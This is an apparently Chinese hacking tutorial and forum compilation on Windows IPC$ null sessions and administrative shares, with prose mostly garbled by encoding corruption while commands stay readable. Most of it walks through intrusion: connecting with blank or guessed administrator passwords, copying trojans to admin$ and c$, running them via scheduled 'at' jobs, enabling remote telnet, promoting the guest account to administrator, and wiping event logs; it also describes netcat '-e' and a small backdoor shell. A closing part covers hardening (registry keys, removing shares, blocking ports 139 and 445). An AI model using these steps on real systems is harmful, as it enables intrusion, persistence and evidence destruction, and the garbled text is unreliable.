ipc$ϸʹȫ
һ ǰ 

Ϲipc$ֵ¿νţëҲ֮˵ѾΪģʽҲûԸٰѾΪʽĶóŪ 
˵ҸΪЩ½ĲϸڵһνӴipc$Ĳ˵򵥵в貢ܽǵԻһhack̳һipc$ڵɻж٣ҲοϵһЩϣ̳Լ̳ӣдƪܽʵ£һЩ׻Ի˵˵ôҲҪǻԭ! 
ע⣺۵ĸĬϷwin NT/2000£win98ڴ˴֮Уwin XpڰȫߣãлὫۡ 


 ʲôipc$ 


IPC$(Internet Process Connection)ǹ"ܵ"ԴΪý̼ͨŶŵܵͨṩεûͿ˫ԽȫͨԴͨмݵĽӶʵֶԶ̼ķʡIPC$NT/2000һ¹ܣһص㣬ͬһʱڣIPֻ֮һӡNT/2000ṩipc$ܵͬʱڳΰװϵͳʱĬϹе߼(c$,d$,e$)ϵͳĿ¼winntwindows(admin$)еЩ΢ĳԶΪ˷ԱĹУϵͳȫԵĽ͡ 
ƽʱ˵ipc$©ipc$©ʵipc$һϵ©,֮ô˵һָ΢ԼõǸšջỰNull sessionôʲôǿջỰأ 


 ʲôǿջỰ 


ڽܿջỰ֮ǰбҪ˽һһȫỰνġ 
Windows NT 4.0ʹսӦЭԶ̻һỰģɹĻỰΪһȫ˫ͨͨϢ̵Ĵ˳£ 
1ỰߣͻỰߣһݰȫĽ 
2һ64λʵսͻؿͻ 
3ͻȡɷ64λͼỰʺŵĿصʵӦ 
4Ӧ͸ذȫ֤LSALSAͨʹøûȷĿʵӦԱȷݡߵʺǷıʺţʵطʺһʺţӦ͵ȥʵսӦʵΪȷһƲȻ͸ͻͻʹӵϵԴֱĻỰֹ 
һȫỰĴ¹̣ôջỰأ 

ջỰûεĻỰδṩû룩WIN2000ķʿģͣջỰĽͬҪṩһƣǿջỰڽвûоûϢ֤вûϢˣỰϵͳ䷢ͼϢⲢʾջỰвȫʶSIDʶû飩һջỰLSAṩƵSIDS-1-5-7ǿջỰSIDûǣANONYMOUS LOGONûǿûбпģǲSAMݿҵϵͳõʺţưαװ飺 
Everyone 
Network 
ڰȫԵ£ջỰȨʵȨʵһϢôջỰ׿ʲôأ 


 ջỰʲô 


NTĬϰȫ£ӿоĿϵû͹everyoneȨ޵ĹСעȣûʲô̫üֵ2000øСΪWindows 2000 Ժ汾ĬֻйԱͱݲԱȨʵעʵҲ㣬ߡЩǿԿַλỰûжôһipc$ջỰһȱٵ壬ΪǴԵõбһĺڿѾ㹻ˡǿջỰܹʹõľ 


1 ȣȽһջỰҪĿ꿪ipc$ 
net use \\ip\ipc$ "" /user:"" 
ע⣺ĸոnetuseмһոuseһҸһո 


2 鿴ԶĹԴ 
net view \\IP 
ͣ˿ӺôԲ鿴ԶĹԴ˹Եõƽ 
 \\*.*.*.*ĹԴ 
Դ  ; ע 

----------------------------------------------------------- 
NETLOGON Disk Logon server share 
SYSVOL Disk Logon server share 
ɹɡ 


3 鿴Զĵǰʱ 
net time \\IP 
ͣôԵõһԶĵǰʱ䡣 


4 õԶNetBIOSûбҪԼNBT 
nbtstat -A IP 
ôԵõһԶNetBIOSûбҪnetbios֧֣½ 

Node IpAddress: [*.*.*.*] Scope Id: [] 

NetBIOS Remote Machine Name Table 

Name Type Status 
--------------------------------------------- 
SERVER <00> UNIQUE Registered 
OYAMANISHI-H <00> GROUP Registered 
OYAMANISHI-H <1C> GROUP Registered 
SERVER <20> UNIQUE Registered 
OYAMANISHI-H <1B> UNIQUE Registered 
OYAMANISHI-H <1E> GROUP Registered 
SERVER <03> UNIQUE Registered 
OYAMANISHI-H <1D> UNIQUE Registered 
..__MSBROWSE__.<01> GROUP Registered 
INet~Services <1C> GROUP Registered 
IS~SERVER......<00> UNIQUE Registered 

MAC Address = 00-50-8B-9A-2D-37 

ϾǾʹÿջỰ飬ҲܻòٶӴҪעһ㣺IPC$ӵĲEventLog¼¼Ƿ¼ɹ ˣôǾipc$ʹõĶ˿ʲô 


 ipc$ʹõĶ˿ 


˽һЩ֪ʶ 
1 SMBServer Message Block) WindowsЭ壬ļӡķ 
2 NBTNETBios Over TCP/IP)ʹ137UDP138UDP139TCP˿ʵֻTCP/IPЭNETBIOS绥 
3 WindowsNTSMBNBTʵ֣Windows2000УSMB˻NBTʵֱ֣ͨ445˿ʵ֡ 

Щ֪ʶǾͿԽһ۷繲Զ˿ڵѡˣ 

win2000ͻ˵ 
1 NBTӷʱͻ˻ͬʱԷ139445˿ڣ445˿ӦôͷRST139˿ڶϿӣ455˿ڽлỰ445˿Ӧʱʹ139˿ڣ˿ڶûӦỰʧܣ 
2 ڽֹNBTӷʱôͻ᳢ֻԷ445˿ڣ445˿ӦôỰʧܡɴ˿ɼֹNBTwin 2000win NTĹʽʧܡ 


win2000˵ 
1 NBT, ôUDP˿137, 138, TCP ˿ 139, 445ţ 
2 ֹNBTôֻ445˿ڿš 


ǽipc$ỰԶ˿ڵѡͬԭԶ׼Զ̷ûм139445˿ڣipc$Ự޷ġ 


 ipc$hackе 


˵ģʹ㽨һյӣҲԻòٵϢЩϢбزٵģܹĳһһȨ޵ûݵ½ĻôͻõӦȨޣȻԹԱݵ½,ٺ,ɾ˲ˣϿΪΪˡҲҪ˵̫磬ΪԱ벻ôø㵽ģȻһЩĵĹԱϾڲȴǰˣǰȫʶߣԱҲСˣõԱ뽫ԽԽѵģ˽ĿܾԼСȨûȨ޽ӣipc$ʱ޷ӣķipc$ӲܵģԲҪÿӶܳɹǲʵġ 
ǲЩģҲ,ؼҪ̬Ҫipc$ֵռҪΪս޲ʤ,ֻǺַܶеһ֣пһɱҲпһЩģںڿ͵ÿ·ͨһ·ͨĵѰҰɣ 


 ipc$ʧܵĳԭ 

һЩĵipc$ʧܵԭ 


1 IPCWindows NTϵͳеĹܣҪõWindows NTкܶDLLԲWindows 9.x/MeϵͳУҲ˵ֻnt/2000/xpſ໥ipc$ӣ98/meǲܽipc$ӵģ 


2 ɹĽһipc$ӣҪԷipc$ʹǿҲԷرipc$㽫Ὠʧܣ 


3 δLanmanworkstationṩͨѶû޷ʾΪWorkstation 


4 ԷδLanmanserverṩ RPC ֧֡ļӡԼܵipc$ڴ˷ûԶ޷ӦʾΪServer 


5 ԷδNetLogon֧ϼ pass-through ʻ¼ݣ 


6 ԷֹNBTδ139˿ڣ 


7 Էǽ139445˿ڣ 


8 ûȻջỰųִ󣩣 


9 󣺿ܶ˻˿ո񣬵ûвոʱߵ˫ſʡԣΪգֱ""ɣ 


10 Ѿӵ¶Էôipc$ӽԶϿҪ½ӡ 


,ҲԸݷصĴŷԭ 
5ܾʣܿʹõûǹԱȨ޵ģȨޣ 
51Windows޷ҵ·⣻ 
53Ҳ·ipַĿδĿlanmanserverδĿзǽ˿ڹˣ 
67ҲlanmanworkstationδĿɾipc$ 
1219ṩƾѴڵƾݼͻѾͶԷһipc$ɾ 
1326δ֪û룺ԭˣ 
1792ͼ¼¼ûĿNetLogonδ 
2242ûѾڣĿʺŲԣǿƶҪ롣 


 ļʧܵԭ 


ЩȻɹĽipc$ӣcopyʱȴ鷳޷Ƴɹô¸ʧܵĳԭЩأ


 

 

1 äĿ 
ֵ࣬ռ50%ϡ֪ԷǷйļУͽäĿƣ¸ʧܶƵĺܡҽڽи֮ǰnet view \\IPһ¶ԷĹҪΪipc$ӽɹ˾һйļС 

2 ĬϹжϴ 
ҲǴҾģҪС棺 

1Ϊܽipc$ӵһĬϹڽ֮admin$֮ĬϹļ¸ʧܡipc$ӳɹֻ˵Էipc$ipc$ĬϹ£ipc$һܵĸʵʵļУĬϹipc$ıҪ 

2net view \\IP ޷ʾĬϹΪĬϹ$ͨǲж϶ԷǷĬϹԷδĬϹôĬϹеĲܳɹ󲿷ɨɨͬʱɨĬϹĿ¼Աķ 

3ûȨ޲Σ 
1йĬϹͨʱȨǲģ 
2ĬϹʱҪйԱȨޣ 
3ͨʱҪӦȨޣԷ趨ķȨޣ 
4Էͨǽȫãֹⲿʹ 

Ҫ˵һ㣺ҪΪadministratorһǹԱԱǿԸĵġ 


4ǽɱھ 
ҲĸƲѾɹԶʱǽɱˣҲļпľƵ˾ڵʧܡ˽㸴ʱҪСģǰˡ 


ǺǣҲ֪ipc$ʵʲлǧٹֵ⣬ֻܽһЩû˵ģֻôԼȥˡ 


 δĿIPC$Լ 


Ŀipc$׾ܴ򿪵ģҪ´ˡҪһadminȨ޵shell,telnet,ľȣȻshellִnet share ipc$Ŀipc$net share ipc$ /delرչҪļУnet share baby=c:\Ͱc̿ΪΪbabyˡ 


ʮ һЩҪshellɵ 


̳ܶⷽдʮֲ׼ȷһЩҪshellͼ򵥵ipc$ִˣáôܽһҪshellɵ 

1 Զûû޸û룬ĲҪshellɣ 

2 Զipc$ĬϹͨĲҪshellɣ 

3 /رԶķҪshellɣ 

4 /ɱԶḶ̌ҲҪshellɡ 


ʮһ пܻõ 


עڱػԶ̣ڱأֻڻԶshell󣬲ԶִС 

1 : 
net use \\192.168.1.105\ipc$ "abc" /user:"abc" 

2 ǿ: 
net use \\192.168.1.105\ipc$ "abc" /user:"abc" 

3 鿴ԶĹԴĬϹ 
net view \\192.168.1.105 

4 鿴ĹԴԿصĬϹ 
net share 

5 õԶûб 
nbtstat -A IP 

6 õûб 
net user 

7 鿴Զĵǰʱ 
net time \\IP 

8 ʾǰ 
net start 

9 /رձط 
net start  /y 
net stop  /y 

10 ӳԶ̹: 
net use z: \\IP\baby 
ΪbabyĹԴӳ䵽z 

11 ɾӳ 
net use c: /del ɾӳc̣ 
net use 192.168.1.105 /del /yɾȫ 

12 Զļ 
copy \D:\Զ\Զ\Զ.exe \\192.168.1.105\磺 
copy ccbirds.exe \\*.*.*.*\c ǰĿ¼µļƵԷc 

13 ԶӼƻ 
at \\ip ʱ 磺 
at \\127.0.0.0 11:00 love.exe 
ע⣺ʱ価ʹ24СʱƣϵͳĬ·system32/²ü·ȫ· 


14 Զtelnet 
ҪõһСopentelnet.exeվ㶼УһҪĸҪ 

1Ŀ꿪ipc$ 
2ҪӵйԱʺ 
3Ŀ꿪RemoteRegistryû͸ntlm֤ 
4WIN2K/XPЧNTδ 
ʽOpenTelnet.exe \\server account psw NTLM֤ʽ port 
£c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 90 

15 û/Ա 
1 net uesr account /active:yes 
2 net localgroup administrators abc /add 

16 رԶtelnet 
ͬҪһСResumeTelnet.exe 
ʽResumeTelnet.exe \\server account psw 
£c:\>ResumeTelnet.exe \\*.*.*.* administrator "" 

17 ɾһѽipc$ 
net use \\IP\ipc$ /del 


̳̲ڸ£°汾½ٷվ˲ԭhttp://ccbirds.yeah.net 


ʮ ipc$ֲ 

ʵֲ˰ͬҾ˵һ³İɣǺǣ׳ˣ 

1 ɨѰ⣬SSSX-scanȣı㣬ȻĿ꣬ɨ˹ԱȨ޵ĿԽĲˣڵõadministratorΪ 


2 ʱ·ѡҪôԷtelnetУ,Ҫôľͼν棩Ǿtelnet· 


3濪telnetûɣҪõopentelnetС 
OpenTelnet.exe \\192.168.1.105 administrator "" 1 90 
Ϣ 
******************************************************* 
Remote Telnet Configure, by refdom 
Email: refdom@263.net 
OpenTelnet.exe 

UsagepenTelnet.exe \\server username password NTLMAuthor telnetport 
******************************************************* 
Connecting \\192.168.21.*...Successfully! 

NOTICE!!!!!! 
The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23 

Starting telnet service... 
telnet service is started successfully! telnet service is running! 

BINGLE!!!Yeah!! 
Telnet Port is 90. You can try:"telnet ip 90", to connect the server! 
Disconnecting server...Successfully! 
*˵Ѿһ˿90telnet 


4 telnetȥ 
telnet 192.168.1.105 90 
ɹ㽫Զһshell,ʱԼĻһ⼦ˣôʲôأguestټɣ 


5 C:\>net user guest /active:yes 
*GuestûҲп˼ҵguestԻģnet user guestһʻõֵyesno 


6 C:\>net user guest 1234 
*GuestΪ1234,߸ĳϲ 


7 C:\>net localgroup administrators guest /add 
*GuestΪAdministratorʹԺԱ룬Ҳguest¼ˣҲҪΪͨȫԵãԽֹguestʻԶ̷ʣǺǣǵĺҲͰˣԸϵ۱Guest 


8 ˣһ·ľ 


9 ȣȽipc$ 
C:\>net use \\192.168.1.105\ipc$ "" /user:administrator 


10 ȻҪϴҪ֪ʲô 
C:\>net view \\192.168.1.105
 \\192.168.21.*ĹԴ 
Դ  ; ע 

----------------------------------------------------------- 
C Disk 
D Disk 
ɹɡ 
*ˣǿԷC,ḌͿһ̸ļˡٴΪnet view޷ĬϹͨ淵صĽǲж϶ԷǷĬϹ 


11 C:\>copy D:\Զ\Զ\Զ.exe \\192.168.1.105\c 
Ѹ 1 ļ 
*Խľͻlove.exeԷc£ȻܸƵϵͳļõˣױ 


12 ľǰȿڵʱ 
net time \\192.168.21.* 
\\192.168.21.*ĵǰʱ 2003/8/22  11:00 
ɹ 


13 atɣԷһҪTask SchedulerָʱУͲ 
C:\>at \\192.168.21.* 11:02 c:\love.exe 
¼һҵҵ ID = 1 


14 ʣ¾ǵˣȹ11:02Ϳÿƶȥˣɹ㽫ͼνȥԶˣʧܣôھҲܳ򱻷ǽɱˣˣûôɰɣֻ÷ 


ţˣֻˡĲѾᳵ·ˣҲøЧ·CA¡guestp***ecִľp***ec \\tergetIP -u user -p paswd cmd.exeֱӻshellȣЩǿԵãı㡣Ҫ˰־ɾŸelsave.exe 
ipc$֣Ͳܲ˵ηôҪأ


 

 

ʮ ηipc$ 


1 ֹӽö(˲ֹӵĽ) 

1 
regeditҵ[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]RestrictAnonymous = DWORDļֵΪ1 
Ϊ"1"һûȻӵIPC$ͨӵõоSAMʺź͹ϢWindows 2000 "2"ʳرȨΪ2Ļ,ܻһЩⷢΪ1˵ڣ½һٸļֵ 

2 
ڱذȫãزԣȫѡ'ӵĶ'Ӧ 


2 ֹĬϹ 

1쿴عԴ 
-cmd-net share 

2ɾĬϹȻڣ 
net share ipc$ /delete 
net share admin$ /delete 
net share c$ /delete 
net share d$ /deletee,f,Լɾ 

3ֹͣserver 
net stop server /y server¿ 

4ֹԶĬϹ˲δرipc$ 
-regedit 

server:ҵ[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]AutoShareServerDWORDļֵΪ:00000000 

pro:ҵ[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]AutoShareWksDWORDļֵΪ:00000000 
˵ڣ½(һ-½-˫ֵֽһٸļֵֵĬǲڵģҪԼֶӡ 


3 رipc$ĬϹķerver 
---ҵserverһ----ѡѽ ʱܻʾ˵XXXҲرǷΪЩҪķҪlanmanserverҪ 


4 139445˿ 
û˿ڵ֧֣޷ipc$ģ139445˿ֹͬipc$֡ 

1139˿ڿֹͨNBT 
ӣTCP/ITԣ߼WINSѡTCP/ITϵNETBIOSһ 

2445˿ڿͨ޸ע 
һֵ 
Hive: HKEY_LOCAL_MACHINE 
Key: System\Controlset\Services\NetBT\Parameters 
Name: SMBDeviceEnabled 
Type: REG_DWORD 
Value: 0 
޸ 

ע⣺ε˿ڣ㽫޷ipc$ֱˡ 


3װǽж˿ڹ 


5 ø룬ֹͨipc$ٳ롣 


ʮ ipc$ʴѡ 


˵һѵ۶ʵָ⣬Ϊ˸İҿüȫ̳nӣһЩдԵʴеһЩҸģһЩ̳ϵĻظʲô©ʹ󣬻 


1.ipc$ֵʱ򣬻ڷ¼¼ʲô취Բ÷ 

¼¼һģߺóɾͿˣ⼦֡ 


2.㿴Ϊʲôӵܸ 
net use \\***.***.***.***\ipc$ "" /user:"û" 
ɹ 
copy icmd.exe \\***.***.***.***\admin$ 
Ҳ· 
ɹ 

𣺿ԭ 
1Ȩ޲ܷĬϹ 

2Էûпadmin$ĬϹҪΪܽipc$ӣԷһĬϹܶ˶ôΪʱԱĬϹͨc$,d$,c,dȣǲУҪȨˣǹԱȨޣԿtelnet,ܳɹڸҲС 


3.ԷIPC$ܽӣCDʱҪ룬֪ǿû̫Ȩޣ
nbtstat -a 192.168.1.103
net use [url=file://192.168.1.105/ipc$]IPipc$[/url] "" /user:""
net use \\192.168.1.104\ipc$ "" /user:"abc"
net use h: \\192.168.1.105\c$ 
net use \\192.168.1.104\ipc$ "" /user:"administrator" IPC 
net use \\192.168.1.103\ipc$ "abc" /user:"abc" IPCǿ 
net use h: 192.168.1.105c$ "abc" /user:"abc" 
ֱӵ½ӳԷCΪH: 
net use h: \\192.168.1.105\c$ "" /user:"administrator" 
telnet 192.168.1.105
NET START 192.168.1.105 TELNET
net use h: \\192.168.1.105\d$ ½ӳԷCΪH: 
net use \\192.168.1.103\ipc$ /del ɾIPC 
net use h: /del ɾӳԷصΪH:ӳ 
net user û롡/add û 
net user guest /active:yes guestû 
net user 鿴Щû 
net user ʻ 鿴ʻ 
mstsc /v: 192.168.1.105:8081 /console
net localgroup administrators û /add "û"ӵԱʹйԱȨ,ע⣺administratorsø 
net start 鿴Щ 
net start  (:net start \\192.168.1.105\c$ net start schedule) 
net stop  ֹͣĳ 
net time \\Ŀip 鿴Էʱ 
net user \\192.168.1.105 abc /active:yes 
net time \\Ŀip /set ñؼʱ"ĿIP"ʱͬ,ϲ/yesȡȷϢ 
net view 鿴ؾڿЩ 
net view \\ip 鿴ԷڿЩ 
net config ʾϵͳ 
net logoff ϿӵĹ 
net pause  ͣĳ 
net send ip "ıϢ" ԷϢ 
net ver ʹõͺϢ 
net share 鿴ؿĹ 
net share \\192.168.1.105\ipc$ ipc$ 
net share ipc$ /del ɾipc$ 
net share c$ /del ɾC 
net user guest 12345 guestû½ýΪ12345 
net password  ϵͳ½ 
netstat -a 鿴Щ˿,netstat -an 
netstat -n 鿴˿ڵnetstat -an 
netstat -v 鿴ڽеĹ 
netstat -p Э netstat -p tcq/ip 鿴ĳЭʹ鿴tcp/ipЭʹ 
netstat -s 鿴ʹõЭʹ 
nbtstat -A ip Է136139һ˿ڿ˵ĻͿɲ鿴Է½û03ǰΪû-ע⣺-AҪд 
tracert - ip() ·ɣݰ"-w"óʱ 
ping 192.168.1.105() ԷĬϴСΪ32ֽڵݣ"-l[ո]ݰС""-nݴ""-t"ָһֱping 
ping -t -l 65550 ip ֮ping(ʹ64Kļһֱpingͳ֮ping) 
ipconfig (winipcfg) windows NTXP(windows 95 98)鿴ipַipconfigò"/all"ʾȫϢ 
tlist -t бʾ(ΪϵͳĸӹߣĬûаװģڰװĿ¼Support/toolsļ) 
kill -F  -Fǿƽĳ(ΪϵͳĸӹߣĬûаװģڰװĿ¼Support/toolsļ) 
del -F ļ -FͿɾֻļ,/AR/AH/AS/AAֱʾɾֻءϵͳ浵ļ/A-R/A-H/A-S/A-Aʾɾֻءϵͳ浵ļ"DEL/AR *.*"ʾɾǰĿ¼ֻļ"DEL/A-S *.*"ʾɾǰĿ¼³ϵͳļļ

ҪԶIPC$ӱ߱1гܵ룻2Զ̻Severһ㶼ˣǸ֪һ㣻3˽Net Use֮X-scanɨһЩipc©߳ΪյġõIP 192.168.0.1.Pingһ£ȷߡȻWindowsµDos£cmd)룺
net use \\116.115.20.29\ipc$ "" /user:"adminstrator"
гɹͨעԶӣڵһ˵иԶ̸ķעҲ԰⼦ĹӰ䵽ҵĵԡ
net use t:\\192.168.1.103\c$
ɺͿҵĵ￴z̷Զ̻c̡shanlu֣WINNTAutoAttack.exeIPC$1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators"""ɨûadministratorsΪ""IPַ(õǴ㹥ĻͿ127.0.0.1һӣΪΪ""ԵһŴͲ룬һ˫ûadministratorsɳɹɡ2. C:\>copy srv.exe \\127.0.0.1\admin$ȸsrv.exeȥToolsĿ¼¾У$ָadminûc:\winnt\system32\һʹc$d$˼CḌ⿴ҪƵʲôطȥˣ3. C:\>net time \\127.0.0.1ʱ䣬127.0.0.1 ĵǰʱ 2002/3/19  11:00ɹɡ4. C:\>at \\127.0.0.1 11:05 srv.exeatsrv.exeɣõʱҪʱ죬Ȼô.5. C:\>net time \\127.0.0.1ٲ鵽ʱûУ127.0.0.1 ĵǰʱ 2002/3/19  11:05Ǿ׼ʼ6. C:\>telnet 127.0.0.1 99õTelnetɣע˿99TelnetĬϵ23˿ڣʹõSRVڶԷΪǽһ99˿ڵShellȻǿTelnetȥˣSRVһԵģ´ε¼ҪټǴ㽨һTelnetҪõntlm7.C:\>copy ntlm.exe \\127.0.0.1\admin$Copyntlm.exeϴϣntlm.exeҲڡ⡷ToolsĿ¼У8. C:\WINNT\system32>ntlmntlmC:\WINNT\system32>ָǶԷntlmʵڶԷУ"DONE"ʱ򣬾˵ѾȻʹ"net start telnet"Telnet9. Telnet 127.0.0.1ûͽԷˣDOSϲһ򵥣(Ȼʲô?ʲôʲô,)ΪԷһ,ٰguestӵ10. C:\>net user guest /active:yesԷGuestû11. C:\>net user guest 1234GuestΪ1234,Ҫ趨12. C:\>net localgroup administrators guest /addGuestΪAdministrator^_^(ԱģguestʺûıĻ´ǿguestٴη̨һ̨ôܷһ̨ԴʲôԶЭ
ͷ֣0 - ʱ䣺2006-3-28 20:30
ߣ wxy5174 -  һ
Ѵ
ںڿڶֶУͨIPC$ֳΪĿǰȽϳһַʽ乥˵ѾΪģʽѷǳô¡֪֪ˣܰսֿǣ˽һַʽĻ֪ʶ
IPCInternet Process ConnectionдҲԶӡWindows NT/2000/XPеһܣ֮佨ͨӡһЩͨų֮ͨſԽIPC档ȷIPCӾںõĵصͨصԶĬ£IPCǹģҲ˵΢ѾΪںصIPCˣֻIPCҲΪIPC֡
IPC$ǹ˼صĹ΢ϵͳá$ʾصĹC$صĹC̡Ҳ˵CǹģCûǸ֡־IPC$ǹܵԴΪý̼ͨŶŵ֤ܵͨûӦȨޣԶ̹Ͳ鿴ĹԴʱʹáIPC$ĿһյӶû룡ȻԷIPC$Ӳϵġյӣ߻ԵõĿϵûб
ʣIPCҪʲô
𣺽IPCҪ˫ǻNTܹϵͳWindows Me/98/95ԡ
ʣôܽIPCأҪʲôڿ͹أ
𣺽IPCӲҪκκڿ͹ߣWindowsоˣҪ֪Զû롣CMDnet use\\ip\ipc$ "password" /user:"username"ӡע⣬Զ̷ûм139445˿ڣỰ޷ġҲ˵IPC$ҪԷ139445˿ڡ
ʣIPC$֮ڿʲô
ڿʹùԱȨ޵˺źĿIPC$ͿԺͶԷϵͳ롰ˡڿͿʹøзʽĹߣpstoolsϵСWin2000SrvReskittelnethackȻĿϢĿĽ̺ͷȡĿ꿪ĬϹûĻڿͻ㿪ڿ;ͿϴľУҲtftpftpİ취ϴdwrccVNCRemoteAdminȹߣľֱӿĹܣֱӿǡWin2000 serverڿͻῼǿն˷Էơ
ʣ޷ԼIPC$ǷζҾͲܺͶԷIPC$أ
𣺲ǵģIPC$ͱIPC$ͬĸ޷ԼIPC$ӰԼǷܹ˽IPC$
ʣ˵иӣôأ
𣺼˵ӼҪûͿԽIPCӣǵòʲôȨ޵ġӵnet use \\IP\ipc$ "" /user:""ûεĻỰδṩû룩Win2000ķʿģͣջỰĽͬҪṩһƣǿջỰڽвûоûϢ֤вûϢˣỰ޷ϵͳ䷢ͼϢⲢʾջỰвȫʶSIDʶû飩һջỰLSAṩƵSIDS-1-5-7ǿջỰSIDûǣANONYMOUS LOGONûǿûбпģ޷SAMݿҵϵͳõ˺ţưαװ飺EveryoneNetworkڰȫԵ£ջỰȨʵȨʵһϢ
ʣʲôã
𣺶NTĬϰȫ£ӿоĿϵû͹EveryoneȨ޵ĹСעȣûʲô̫üֵWin2000øСΪWin2000Ժ汾ĬֻйԱͱݲԱȨʵעʵҲ㣬ߡЩǿԿַλỰûжôһIPC$һȱٵ壬ΪǴԵõûбӻоû飬Ŀϵͳ͵ȡһĺڿѾ㹻ˡ
ʣÿӵõԶûб
ȣȽһջỰҪĿ꿪ipc$net use \\ip\ipc$ "" /user:""ɽӡȻnet view \\IP鿴ԶĹԴԷ˹Ϳгͼע͡ʹnbtstat -A IPͿԵõԶNetBIOSûбҪԼNBTע⣬IPC$ӵĲEventLog¼¼Ƿ¼ɹ
ʣӺIPC$һ
ӺIPC$ǲͬĸûεĻỰ仰˵һʡIPC$Ϊý̼ͨŶŵ֤ܵͨûӦȨޡIPC$ӿʵԶ̵½ĬϹķʡ
ʣIPC$Ǹ©
жᵽIPC$©ʵIPC$ϵ©Ϊ˷ԱԶ̹ŵԶ½ܣһĬϹе߼(c$,d$,e$)ϵͳĿ¼winntwindows(admin$)еЩԶΪ˷ԱĹһЩ߻IPC$ʹԴûбʹֵ乤߽̽⣬ϣڻøߵȨޣӶﵽɸ˵ĿġǶ˵IPC$ڿá
ʣIPC$ӳɹnet uset kkk /addһ˻ȴ˻ԼĻϣô£
IPC$ɹֻ˵Զͨζȡһshellֻڻһshell֮Զ̽һ˻ĲֻڱؽС
ʣҽipc$ӵʱ򷵻ϢṩƾѴڵƾݼͻô£
˵ĿһϵIPC$ӣǲģɾɡnet use \\*.*.*.*\ipc$ /del
ʣIPC$ĬϹʲôϵ
ĬϹΪ˷ԱԶ̹ĬϿĹе߼(c$,d$,e$)ϵͳĿ¼winntwindows(admin$)ͨipc$ӿʵֶЩĬϹķʣǰǶԷûйرЩĬϹ
ʣֻҪԷ139˿ڻ445˿ھͿԽIPC$
뷨һȷ139445˿ڿδؿԽIPC$IPC$ɽʾԷ139˿ڻ445˿ڿˡ
ʣӳͷĬϹ
ʹnet use z: \\ĿIP\c$ "" /user:"û"ԷcӳΪԼẓơ
ѾĿ꽨IPC$ֱIP̷$ʡִcopy muma.exe \\IP\d$\path\muma.exeӳҲԣֻûˣ룺net use y: \\IP\d$Ȼִcopy muma.exe y:\path\muma.exeɡ·аոʱ""·ȫס
ʣɾӳipc$ӣ
net use \\IP\ipc$ /delɾһĿIPC$ӡnet use z: /delɾӳẒơnet use * /delɾȫɾʱʾҪ󰴡yȷϡ
ʣηIPC$֣
Ҫֹӽö(˲ֹӵĽ)regeditҵHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSAµDWORDֵRestrictAnonymousļֵΪ00000001
Ȼnet share쿴عԴɾ
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /deletee,f̷ͬɾ
ü±༭ݵעļΪֵ.Regļʹʱ˫ɹرĬϹIPC$
Windows Registry Editor Version 5.00[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]
"AutoShareServer"=dword:00000000
"AutoSharewks"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"RestrictAnonymous"=dword:00000001ע⣬ĴһҪһУ򲻻ɹУֵAutoShareServerӦC$D$һȱʡֵAutoSharewksӦADMIN$ȱʡֵRestrictAnonymousӦIPC$ӡ
ķҲͨ139445˿ͨIPC$֣Ϊû139445˿ڵ֧޷IPC$ģ139445˿ֹͬIPC$֡139˿ڿֹͨNBTΣǣѡ񱾵ӡTCP/IPԡ߼WINSTCP/IPϵNETBIOSɣͼ1445˿ڿͨ޸עηǣעHKEY_LOCAL_MACHINE\System\Controlset\Services\NetBT\Parameters£½ԤDWORDֵSMBDeviceEnabledֵΪ0Ȼ޸ɡ 

õļNET 

==================================================

1. ֪Էip鿴Էļ
ʼ->->cmd->net view Էip
 ʼ->->cmd->nbtstat -a Էip

2. ֪Է鿴Էip
ʼ->->cmd->ping Է
 ʼ->->cmd->nbtstat -a Է

Զչӣ net use \\IPַ\ipc$ " " /use:" " 

ԹԱݵ¼Զ net use \\IPַ\ipc$ " " /use:" Administrator" 

ļԶWINNTĿ¼£copy Ŀ¼·\ \\IPַ\admin$ 

鿴Զʱ䣩 net time \\IPַ 

ʱĳ at \\IPַ 02:18 readme.exe 

鿴 net view \\IPַ 

鿴netbiosб nbtstat -A IPַ 

ԶCӳΪԼF̣ net use f: \\IPַ\c$ " " /user:" Administrator" 

ԼӵԱ飩 net user û  /add 

net localgroup Administrators û /add 

Ͽӣ net use \\IPַ\ipc$ /delete 

===================================================== 

ƨƨ 

del C:\winnt\system32\logfiles\*.* 

del C:\winnt\system32\config\*.evt 

del C:\winnt\system32\dtclog\*.* 

del C:\winnt\system32\*.log 

del C:\winnt\system32\*.txt 

del C:\winnt\*.txt 

del C:\winnt\*.log 

============================ 

һnetsvc.exe 

ֱгϵķĿѰԶġ ʱ  

netsvc /list \\IPַ 

netsvc schedule \\IPַ /query 

netsvc \\IPַ schedule /start 

OpenTelnet.exe 

ԶTelnet񣬲󶨶˿ڵ7878磺 

OpenTelnet \\192.168.1.103 Administrators  1 7878 

ȻͿtelnet7878˿ڣDOSʽ£ 

telnet IPַ 7878 

winshell.exe 

һǳСľ6Ktelnet7878˿ڣwinshellCMD> 󣬿ɴ 

p Path 鿴winshell·Ϣ 

b reBoot  

d shutDown رջ 

s Shell ִкͻῴɰġ C:\>   

x eXit ˳ε¼ỰֹwinshellУ 

CMD> http://.../srv.exe ͨhttpվϵļwinshellĻϣ 

ġ3389½GUIʽ¼Զ 

塢elsave.exe 

¼־ 

elsave -s \\IPַ -l " application" -C 

elsave -s \\IPַ -l " system" -C 

elsave -s \\IPַ -l " security" -C 

ִкɹӦó־ϵͳ־ȫ־ 

hbulot.exe 

win2kserverwinxp3389 

hbulot [/r] 

ʹ/rʾװɺԶĿʹЧ 

ߡnc.exe(netcat.exe) 

һܺõĹߣһЩűҪõҲá 

Ҫӵĳ: nc [-options] hostname port[s] [ports] ... 

󶨶˿ڵȴ: nc -l -p port [-options] [hostname] [port] 

: 

-e prog ضһӣִ [Σ!!] 

-g gateway source-routing hop point[s], up to 8 

-G num source-routing pointer: 4, 8, 12, ... 

-h Ϣ 

-i secs ʱļ 

-l ģʽվ 

-n ֵָIPַhostname 

-o file ¼16ƵĴ 

-p port ض˿ں 

